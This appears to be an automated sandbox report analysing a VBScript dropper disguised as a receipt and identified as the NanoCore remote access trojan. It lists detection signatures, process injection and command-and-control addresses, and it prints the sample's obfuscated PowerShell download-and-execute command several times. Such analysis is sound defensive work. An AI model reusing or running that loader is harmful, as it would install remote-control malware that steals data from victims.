Loading ...

Play interactive tourEdit tour

Windows Analysis Report 18-ITEMS-RECEIPT.vbs

Overview

General Information

Sample Name:18-ITEMS-RECEIPT.vbs
Analysis ID:483363
MD5:3d701c54bba78c8cbfc22218dd2726d0
SHA1:3e9f34b5b59b54460ab4de151f9b17c93396a593
SHA256:70feaa2efd6ba7ff05fb8d12415f736ffb3d46e35ef797ec6add87434c7c62fa
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Detected Nanocore Rat
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Injects a PE file into a foreign processes
Creates an undocumented autostart registry key
Sigma detected: CrackMapExec PowerShell Obfuscation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sigma detected: Encoded PowerShell Command Line
Java / VBScript file with very long strings (likely obfuscated code)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6360 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\18-ITEMS-RECEIPT.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6488 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 1936 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6500 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6624 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
18-ITEMS-RECEIPT.vbsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x30:$s1: POwerSheLL

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Run\New.vbsPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x30:$s1: POwerSheLL

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.473770924.00000200A3E1A000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x1438:$s1: POwerSheLL
  • 0x2c58:$s1: POwerSheLL
00000003.00000003.276637155.000001E0B3ED1000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x6df0:$s1: POwerSheLL
  • 0xd030:$s1: POwerSheLL
00000000.00000002.473686642.00000200A3E0A000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x84d0:$s1: POwerSheLL
00000000.00000002.474801186.00000200A5B40000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x118:$s1: POwerSheLL
00000000.00000003.472718525.00000200A3E1D000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xcfd8:$s1: POwerSheLL
Click to see the 11 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6624, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6624, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

barindex
Sigma detected: CrackMapExec PowerShell ObfuscationShow sources
Source: Process startedAuthor: Thomas Patzke: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl
Sigma detected: Encoded PowerShell Command LineShow sources
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -spl
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761539190604511.6488.DefaultAppDomain.powershell

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6624, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 6624, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49739 version: TLS 1.0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49779 -> 194.147.140.20:6700
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49784 -> 194.147.140.20:6700
